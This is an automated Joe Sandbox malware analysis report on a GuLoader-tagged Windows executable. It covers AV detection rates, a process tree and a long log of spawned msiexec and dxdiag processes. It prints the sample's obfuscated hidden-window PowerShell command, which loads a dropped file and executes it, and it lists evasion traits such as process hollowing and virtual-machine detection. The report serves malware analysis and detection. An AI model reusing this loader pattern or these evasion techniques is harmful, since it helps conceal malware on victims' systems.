Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ej86aa7Ki7.exe

Overview

General Information

Sample name:Ej86aa7Ki7.exe
renamed because original name is a hash value
Original sample name:05199e2da28bae00c03632e937ba49adba3bd5c9ef102e14639de784a82eb765.exe
Analysis ID:1587855
MD5:cc768b964d98fa2d0cf4d9089176c6b9
SHA1:5150a1c337194f1d224cc71a5487c398c12e94f6
SHA256:05199e2da28bae00c03632e937ba49adba3bd5c9ef102e14639de784a82eb765
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Suspicious powershell command line found
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • Ej86aa7Ki7.exe (PID: 2276 cmdline: "C:\Users\user\Desktop\Ej86aa7Ki7.exe" MD5: CC768B964D98FA2D0CF4D9089176C6B9)
    • powershell.exe (PID: 4796 cmdline: powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SIHClient.exe (PID: 6160 cmdline: C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)
      • msiexec.exe (PID: 360 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5228 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1856 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6120 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5600 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3128 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5800 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6284 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1720 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1568 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 2076 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2292 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5912 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1628 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6596 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 528 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1352 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2452 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6360 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4912 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3936 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 5596 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6156 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4460 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 892 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6428 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2804 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5416 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5568 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6100 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6200 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 3276 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6152 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5448 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5484 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3220 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens), CommandLine: powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ej86aa7Ki7.exe", ParentImage: C:\Users\user\Desktop\Ej86aa7Ki7.exe, ParentProcessId: 2276, ParentProcessName: Ej86aa7Ki7.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens), ProcessId: 4796, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Ej86aa7Ki7.exeVirustotal: Detection: 63%Perma Link
Source: Ej86aa7Ki7.exeReversingLabs: Detection: 60%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 84.4% probability
Source: Ej86aa7Ki7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Ej86aa7Ki7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_0040287E FindFirstFileW,0_2_0040287E
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: SIHClient.exe, 00000004.00000003.2211938438.0000017F02A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?ba33d4e
Source: Ej86aa7Ki7.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SIHClient.exe, 00000004.00000003.2213230493.0000017F02A68000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212798692.0000017F02A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.a
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A
Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP3C1B.tmpJump to behavior
Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP4668.tmpJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_004068DA0_2_004068DA
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_00404CED0_2_00404CED
Source: Ej86aa7Ki7.exeStatic PE information: invalid certificate
Source: Ej86aa7Ki7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal68.evad.winEXE@4487/19@0/0
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404771
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeFile created: C:\Users\user\AppData\Roaming\afdragsordningJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\SIHClient.exeMutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeFile created: C:\Users\user\AppData\Local\Temp\nsaF60A.tmpJump to behavior
Source: Ej86aa7Ki7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Ej86aa7Ki7.exeVirustotal: Detection: 63%
Source: Ej86aa7Ki7.exeReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeFile read: C:\Users\user\Desktop\Ej86aa7Ki7.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Ej86aa7Ki7.exe "C:\Users\user\Desktop\Ej86aa7Ki7.exe"
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
